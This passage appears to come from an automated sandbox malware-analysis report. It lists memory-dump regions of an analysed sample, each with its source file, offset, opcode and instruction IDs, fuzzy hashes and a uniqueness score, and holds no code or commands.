                                                                      • Instruction Fuzzy Hash: C91103B58003089FDB20CF9AD589BDFBBF8EB48324F108419E918A7600D375A994CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "
                                                                      • API String ID: 0-123907689
                                                                      • Opcode ID: def0662373ac5673aa0100f099ba33b2464ddc7becb84aaae02cea2b15ad39ac
                                                                      • Instruction ID: 484effa61d43b84c0479ff27e97686e55e2707d9767d8cc4ebad2ce33be18eb5
                                                                      • Opcode Fuzzy Hash: def0662373ac5673aa0100f099ba33b2464ddc7becb84aaae02cea2b15ad39ac
                                                                      • Instruction Fuzzy Hash: E0F1F374E002588FEB24CFA9C4987EDFBF6AF88314F24C16AD418AB295D7749985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a39c4ce8be9aa1425d307f82a9eb9dc3fe66ac84aec1e50758617d60503bdefa
                                                                      • Instruction ID: e24102aff5ea3dc611944783cb015738b600608fa67b45556e9f0cf6199b25c1
                                                                      • Opcode Fuzzy Hash: a39c4ce8be9aa1425d307f82a9eb9dc3fe66ac84aec1e50758617d60503bdefa
                                                                      • Instruction Fuzzy Hash: 9D528C74E01268CFDB64DFA5C984BDDBBB2BB89304F2085E9D409AB254DB319E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 095cd1ed6021a82a87bfc35b2f49188b518bb035d00eee3d2ccdbba4adae886a
                                                                      • Instruction ID: 05ad182956389b9f8c89d9f99a5f7d6bf4379244ebd756a4860d1dc4f944a8a1
                                                                      • Opcode Fuzzy Hash: 095cd1ed6021a82a87bfc35b2f49188b518bb035d00eee3d2ccdbba4adae886a
                                                                      • Instruction Fuzzy Hash: 201291B2411F468ED314CF67EC889893BA1B795328B904728D2653AAF1D7B625CFCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 021c2753a7e8c65ab4c14f767ab20e835d7a94361c9c4027e095e71623b5d5df
                                                                      • Instruction ID: ca42132e1a2f8e1e0a1ef6e1aab669def7f2fce3b9f6c397c41633d00e75231f
                                                                      • Opcode Fuzzy Hash: 021c2753a7e8c65ab4c14f767ab20e835d7a94361c9c4027e095e71623b5d5df
                                                                      • Instruction Fuzzy Hash: 0FC1E4B2811B468FD710DF67EC889897BA1BB95328B508728D1617B6E0D7B624CFCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36b222b22130a21b4f78c266b6da4dfc94953adc0bb9ab2730afa798b374962b
                                                                      • Instruction ID: 15f9a303936e06fcacbd17df4cd2af6a81c0c8fe4675ab7ab7b3a75d7d62e8e3
                                                                      • Opcode Fuzzy Hash: 36b222b22130a21b4f78c266b6da4dfc94953adc0bb9ab2730afa798b374962b
                                                                      • Instruction Fuzzy Hash: F261D674E016598FDB38DFA6D844BADBBB7BB88300F10C5A9D40967358EB315A81DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d08ee1483b16c23fd7ba4270ba3ea7d590ac4df9e7a2d6426821fc1a834db1fd
                                                                      • Instruction ID: 3314aa6352200938cb765a96467a19fa5edea794dd9854f8d26fa9b1274eaeff
                                                                      • Opcode Fuzzy Hash: d08ee1483b16c23fd7ba4270ba3ea7d590ac4df9e7a2d6426821fc1a834db1fd
                                                                      • Instruction Fuzzy Hash: 1441E8B5D012589FDB28CFAAD8883DEFBF2BF89314F14C12AD418AA294DB750945CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%